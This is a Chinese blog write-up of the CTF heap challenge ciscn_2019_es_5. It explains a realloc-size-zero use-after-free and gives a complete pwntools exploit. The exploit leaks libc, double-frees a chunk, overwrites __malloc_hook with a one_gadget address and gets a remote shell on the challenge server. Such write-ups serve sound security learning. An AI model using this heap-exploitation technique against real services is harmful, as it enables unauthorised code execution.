ha1vk's blog
0%

ciscn_2019_es_5(realloc(ptr,0)会free掉ptr并返回0)

发表于 分类于

首先,检查一下的保护机制

然后,我们用IDA分析一下

Create的时候,没有检查size,因此size可以为0

Edit的时候,调用了realloc,并且没有检查size是否为0,如果为0,则这个chunk会被free掉,但是堆指针没有从flist堆数组里移除,这就造成了UAF。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
#coding:utf8
from pwn import *

#sh = process('./ciscn_2019_es_5')
sh = remote('node3.buuoj.cn',25051)
libc = ELF('/lib/x86_64-linux-gnu/libc-2.27.so')
malloc_hook_s = libc.symbols['__malloc_hook']
one_gadget_s = 0x10a38c

def add(size,content):
   sh.sendlineafter('Your choice:','1')
   sh.sendlineafter('size?>',str(size))
   sh.sendafter('content:',content)

def edit(index,content,have_content = True):
   sh.sendlineafter('Your choice:','2')
   sh.sendlineafter('Index:',str(index))
   if have_content:
      sh.sendafter('New content:',content)

def show(index):
   sh.sendlineafter('Your choice:','3')
   sh.sendlineafter('Index:',str(index))

def delete(index):
   sh.sendlineafter('Your choice:','4')
   sh.sendlineafter('Index:',str(index))

#0
add(0x100,'a')
for i in range(7):
   add(0x100,'b')
for i in range(1,8):
   delete(i)
#得到unsorted bin
delete(0)
add(0x30,'a')
#泄露地址
show(0)
sh.recvuntil('Content: ')
main_arena_xx = u64(sh.recv(6).ljust(8,'\x00'))
malloc_hook_addr = (main_arena_xx & 0xFFFFFFFFFFFFF000) + (malloc_hook_s & 0xFFF)
libc_base = malloc_hook_addr - malloc_hook_s
one_gadget_addr = libc_base + one_gadget_s
print 'libc_base=',hex(libc_base)
print 'malloc_hook_addr=',hex(malloc_hook_addr)
print 'one_gadget_addr=',hex(one_gadget_addr)
add(0,'') #1
#realloc释放chunk后,程序没有清空指针,因此,我们再delete一次,就实现了double free
edit(1,'',False)
delete(1)
add(0x10,p64(malloc_hook_addr))
#写malloc_hook
add(0x10,p64(one_gadget_addr))
#getshell
sh.sendlineafter('Your choice:','1')

sh.interactive()